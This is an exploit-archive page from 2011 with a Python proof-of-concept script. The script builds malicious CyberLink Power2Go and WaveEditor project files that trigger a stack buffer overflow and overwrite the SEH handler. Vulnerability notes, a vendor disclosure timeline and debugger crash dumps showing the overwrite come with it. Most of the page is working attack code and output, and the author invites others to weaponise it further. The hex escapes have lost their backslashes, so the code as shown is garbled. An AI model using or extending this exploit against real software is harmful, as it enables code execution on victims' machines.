Home / exploits CyberLink Stack Buffer Overflow
Posted on 09 December 2011
#!/usr/bin/python # # Exploit Title: CyberLink Multiple Products File Project Handling Stack Buffer Overflow POC # by: modpr0be[at]spentera[dot]com (@modpr0be) # Platform: Windows # Tested on: Windows XP SP3, Windows 7 SP1 with: # CyberLink Power2Go 7 (build 196) # CyberLink Power2Go 8 (build 1031) # CyberLink WaveEditor 2.0 (build 2204) # Software Link: http://www.cyberlink.com/downloads/trials/index_en_US.html # CVE : - ### Software Description # CyberLink Power2Go is all-media disc burning software. # Copy all your media to any disc with Power2Go 8! With new System Recovery tools # and over 5000 free DVD menus to choose from on DirectorZone.com, Power2Go 8 not # only burns everything but allows you to create pro-like DVDs, rip CDs and # safeguard valuable data. # CyberLink Wave Editor will help user to convert audio format when producing, editing, # or creating backups for some audios or videos. This additional tools is also included # since PowerDirector 9 to PowerDirector 10, and now included on Power2Go 8. ### Vulnerability Details # Most of CyberLink products contain built-in project file with their own format and # extension. This file usually contains our recently modified project or work. # Most of this filetypes contain this section: # <File src= # <File name= # Generally, those sections will be filled with source path or filename. # both products will lead us to command execution because the address of # SE Handler is overwritten with 0x00410041. # Notes: # I cannot find any good return address for WaveEditor, if you can make it # through the hard way, kudos!! ### Vendor logs: # 10/10/2011 - Bug found # 10/11/2011 - Vendor contacted # 10/11/2011 - Vendor replied and requested POC # 10/11/2011 - POC sent to vendor # 10/31/2011 - Vendor said the POC will be researched # 10/27/2011 - Submitted to CERT # 11/09/2011 - CyberLink updated the product # 11/09/2011 - POC still works on the latest version # 12/09/2011 - No response from vendor, POC release. import time,sys def power2go(): # header for power2go header = ( "x3cx50x72x6fx6ax65x63x74x20x6dx61x67x69x63" "x3dx22x69x6ex73x65x63x75x72x69x74x79x22x20" "x76x65x72x73x69x6fx6ex3dx22x31x30x31x22x3e" "x0dx0ax3cx49x6ex66x6fx72x6dx61x74x69x6fx6e" "x2fx3ex0dx0ax3cx43x6fx6dx70x69x6cx61x74x69" "x6fx6ex3ex0dx0ax3cx44x61x74x61x44x69x73x63" "x20x0dx0ax64x69x73x63x4ex61x6dx65x3dx22x49" "x4ex53x45x43x55x52x49x54x59x22x20x0dx0ax66" "x69x6cx65x44x61x74x65x3dx22x6fx72x69x67x69" "x6ex61x6cx22x20x66x69x6cx65x54x69x6dx65x3d" "x22x30x22x20x0dx0ax64x69x73x63x54x79x70x65" "x3dx22x63x64x22x20x0dx0ax73x65x73x73x69x6f" "x6ex53x69x7ax65x3dx22x30x22x20x0dx0ax50x4f" "x57x42x75x72x6ex65x64x53x69x7ax65x3dx22x30" "x22x20x0dx0ax53x65x63x75x72x65x64x44x61x74" "x61x3dx22x66x61x6cx73x65x22x20x0dx0ax57x68" "x6fx6cx65x53x65x63x75x72x65x64x44x61x74x61" "x3dx22x66x61x6cx73x65x22x20x0dx0ax53x65x63" "x75x72x69x74x79x4bx65x79x53x69x7ax65x3dx22" "x31x36x22x20x0dx0ax48x69x64x65x46x69x6cx65" "x4ex61x6dx65x3dx22x66x61x6cx73x65x22x20x0d" "x0ax62x6fx6fx74x61x62x6cx65x3dx22x66x61x6c" "x73x65x22x20x0dx0ax62x6fx6fx74x46x6cx6fx70" "x70x79x3dx22x66x61x6cx73x65x22x20x0dx0ax62" "x6fx6fx74x49x6dx61x67x65x3dx22x22x20x0dx0a" "x61x75x74x6fx52x75x6ex45x78x65x3dx22x66x61" "x6cx73x65x22x20x0dx0ax61x75x74x6fx52x75x6e" "x45x78x65x50x61x74x68x3dx22x22x20x0dx0ax61" "x75x74x6fx52x75x6ex49x63x6fx6ex3dx22x66x61" "x6cx73x65x22x20x0dx0ax61x75x74x6fx52x75x6e" "x49x63x6fx6ex50x61x74x68x3dx22x22x20x0dx0a" "x41x75x74x6fx53x70x6cx69x74x44x69x73x63x3d" "x22x66x61x6cx73x65x22x20x0dx0ax44x69x73x63" "x53x70x6cx69x74x3dx22x66x61x6cx73x65x22x20" "x0dx0ax41x75x74x6fx4fx76x65x72x42x75x72x6e" "x3dx22x66x61x6cx73x65x22x20x0dx0ax44x61x74" "x61x50x72x6ax74x6fx56x69x64x65x6fx50x72x6a" "x3dx22x66x61x6cx73x65x22x20x0dx0ax73x69x6d" "x75x6cx61x74x69x6fx6ex3dx22x66x61x6cx73x65" "x22x20x0dx0ax62x75x72x6ex50x72x6fx6fx66x3d" "x22x74x72x75x65x22x20x0dx0ax63x6cx6fx73x65" "x44x69x73x63x3dx22x66x61x6cx73x65x22x20x0d" "x0ax76x65x72x69x66x79x44x69x73x63x3dx22x66" "x61x6cx73x65x22x20x0dx0ax64x65x66x65x63x74" "x6dx61x6ex61x67x65x6dx65x6ex74x3dx22x66x61" "x6cx73x65x22x20x0dx0ax63x6fx70x69x65x73x3d" "x22x31x22x20x0dx0ax62x75x72x6ex53x70x65x65" "x64x3dx22x30x22x20x0dx0ax63x64x54x65x78x74" "x3dx22x66x61x6cx73x65x22x20x0dx0ax41x75x64" "x69x6fx4ex6fx72x6dx61x6cx69x7ax65x3dx22x66" "x61x6cx73x65x22x20x0dx0ax41x75x64x69x6fx47" "x61x70x54x69x6dx65x3dx22x32x22x20x0dx0ax46" "x69x6cx65x53x79x73x74x65x6dx3dx22x49x53x4f" "x39x36x36x30x5fx4ax4fx4cx49x45x54x22x3e") body = ( "x73x72x63x3dx22x43x3ax5cx61x62x63x2ex74x78" "x74x22x20x0dx0ax6fx70x65x72x61x74x69x6fx6e" "x3dx22x61x64x64x22x20x0dx0ax62x75x72x6ex73" "x74x61x74x75x73x3dx22x6ex6fx74x62x75x72x6e" "x22x20x0dx0ax73x69x7ax65x3dx22x32x39x32x38" "x36x34x22x20x0dx0ax53x68x6fx77x53x69x7ax65" "x3dx22x32x39x32x38x36x34x22x20x0dx0ax41x6c" "x6cx6fx77x45x6ex63x72x79x70x74x3dx22x66x61" "x6cx73x65x22x20x0dx0ax53x65x63x75x72x65x64" "x52x6fx6fx74x3dx22x66x61x6cx73x65x22x20x0d" "x0ax66x69x6cx65x54x69x6dx65x3dx22x31x32x39" "x33x36x37x33x34x31x35x30x39x37x33x36x38x37" "x34x22x20x0dx0ax6fx6cx64x3dx22x66x61x6cx73" "x65x22x20x0dx0ax74x65x6dx70x66x69x6cx65x3d" "x22x66x61x6cx73x65x22x20x0dx0ax74x65x6dx70" "x64x69x72x6cx65x76x65x6cx3dx22x30x22x20x0d" "x0ax66x6fx72x61x75x64x69x6fx74x72x61x63x6b" "x3dx22x66x61x6cx73x65x22x20x0dx0ax74x61x72" "x67x65x74x41x75x64x69x6fx43x44x3dx22x66x61" "x6cx73x65x22x20x0dx0ax64x61x74x61x69x74x65" "x6dx74x79x70x65x3dx22x30x22x20x0dx0ax6dx76" "x70x3dx22x30x22x20x0dx0ax61x75x64x69x6fx53" "x75x62x74x79x70x65x3dx22x30x22x2fx3ex0dx0a" "x3cx2fx44x61x74x61x44x69x73x63x3ex0dx0ax3c" "x2fx43x6fx6dx70x69x6cx61x74x69x6fx6ex3ex0d" "x0ax3cx2fx50x72x6fx6ax65x63x74x3e") pgfile = "overflow.p2g" f = open(pgfile,'w') junk = "A" * 778 nseh = "x42x42" seh = "x43x43" sisa = "x44" * 4200 hell = "x3cx46x69x6cx65" + " " # <File hell+= "name=" + '"'+ junk+nseh+seh+sisa + '"' try: f.write(header+ " " + hell + " " + body) print "[!] Generating", pgfile, ".." time.sleep(1) print "[+] File", pgfile, "successfully created!" print "[*] Now open project file" +" '"+pgfile+"' " + "with CyberLink Power2Go." print "[*] Good luck ;)" f.close() except IOError: print "[-] Could not write to destination folder, check permission.." sys.exit() def waveeditor(): header = ("x3cx50x72x6fx6ax65x63x74x20x41x70x70x6cx69x63x61" "x74x69x6fx6ex3dx22x57x61x76x65x45x64x69x74x6fx72x22x20" "x56x65x72x73x69x6fx6ex3dx22x32x2ex30x22x3e") wvefile = "overflow.wve" f = open(wvefile,'w') junk = "A" * 3000 hell = "x3cx46x69x6cx65x20x53x72x63x3d" # <File src= hell += '"'+ junk + '"' + "x3e" fill = ("x3cx42x6fx6fx6bx6dx61x72x6bx4cx69x73x74x2fx3ex3c" "x2fx46x69x6cx65x3ex3cx2fx50x72x6fx6ax65x63x74x3e") fill = ("x3cx42x6fx6fx6bx6dx61x72x6bx4cx69x73x74x2fx3ex3c" "x2fx46x69x6cx65x3ex3cx43x6fx6dx70x69x6cx61x74x69x6fx6e" "x3ex3cx41x75x64x69x6fx43x44x20x62x75x72x6ex50x72x6fx6f" "x66x3dx22x74x72x75x65x22x20x63x6fx70x69x65x73x3dx22x30" "x22x20x62x75x72x6ex53x70x65x65x64x3dx22x30x22x20x41x75" "x64x69x6fx4ex6fx72x6dx61x6cx69x7ax65x3dx22x66x61x6cx73" "x65x22x20x41x75x64x69x6fx47x61x70x54x69x6dx65x3dx22x32" "x22x2fx3ex3cx2fx43x6fx6dx70x69x6cx61x74x69x6fx6ex3ex3c" "x2fx50x72x6fx6ax65x63x74x3e") try: f.write(header+hell+fill) print "[!] Generating", wvefile, ".." time.sleep(1) print "[+] File", wvefile, "successfully created!" print "[*] Now open project file" +" '"+wvefile+"' " + "with CyberLink WaveEditor." print "[*] Good luck ;)" f.close() except IOError: print "[-] Could not write to destination folder, check permission.." sys.exit() print "[*] CyberLink Multiple Products File Project Processing Stack Buffer Overflow POC." print "[*] by modpr0be <modpr0be[at]spentera[dot]com> | @modpr0be" print " 1.CyberLink Power2Go <= 8.0" print " 2.CyberLink WaveEditor <= 2.0" a = 0 while a < 2: a = a + 1 op = input ("[!] Choose the product: ") if op == 1: power2go() sys.exit() elif op == 2: waveeditor() sys.exit() else: print "[-] Oh plz.. pick the right one :) " ### DUMP OF POWER2GO #(d18.c60): Break instruction exception - code 80000003 (first chance) #eax=7ffde000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005 #eip=7c90120e esp=07d4ffcc ebp=07d4fff4 iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 #ntdll!DbgBreakPoint: #7c90120e cc int 3 #Missing image name, possible paged-out or corrupt data. #Missing image name, possible paged-out or corrupt data. #0:022> g #(d18.d40): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=ec8b55ff ebx=010358b0 ecx=78ad8951 edx=005b12fc esi=00430043 edi=0012d69c #eip=ec8b55ff esp=0012ca70 ebp=00000000 iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 #ec8b55ff ?? ??? #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesCyberLinkPower2Go8Power2Go8.exe - #0:000> !exchain #0012ca9c: Power2Go8!CCLAuMixerAPI::operator=+156ba8 (00560dc8) #0012d104: Power2Go8!CCLAuMixerAPI::operator=+25e23 (00430043) #Invalid exception stack at 00420042 #0:000> d 0012d104 #0012d104 42 00 42 00 43 00 43 00-43 00 43 00 43 00 43 00 B.B.C.C.C.C.C.C. #0012d114 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C. #0012d124 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C. #0012d134 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C. #0012d144 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C. #0012d154 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C. #0012d164 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C. #0012d174 43 00 43 00 43 00 43 00-43 00 43 00 43 00 43 00 C.C.C.C.C.C.C.C. ### DUMP OF WAVE EDITOR #(e44.734): Break instruction exception - code 80000003 (first chance) #eax=7ffd9000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005 #eip=7c90120e esp=00e5ffcc ebp=00e5fff4 iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 #ntdll!DbgBreakPoint: #7c90120e cc int 3 #Missing image name, possible paged-out or corrupt data. #Missing image name, possible paged-out or corrupt data. #0:016> g #(e44.e48): Access violation - code c0000005 (first chance) #First chance exceptions are reported before any exception handling. #This exception may be expected and handled. #eax=00410041 ebx=ffffffff ecx=0240868b edx=420b1802 esi=022ccbe8 edi=00d2f848 #eip=024c47af esp=0012c424 ebp=0012c42c iopl=0 nv up ei pl nz na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210206 #*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesCyberLinkWaveEditorWaveKernel.dll - #WaveKernel!ReleaseWaveKernelClient+0x12a8f: #024c47af 8b4208 mov eax,dword ptr [edx+8] ds:0023:420b180a=???????? #Missing image name, possible paged-out or corrupt data. #Missing image name, possible paged-out or corrupt data. #0:000> !exchain #0012c898: *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:Program FilesCyberLinkWaveEditorWaveEditor.exe - #WaveEditor!CCLAuMixerAPI::CCLAuMixerAPI+da61 (00410041) #Invalid exception stack at 00410041 #0:000> d 0012c898 #0012c898 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. #0012c8a8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. #0012c8b8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. #0012c8c8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. #0012c8d8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. #0012c8e8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. #0012c8f8 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. #0012c908 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A. #
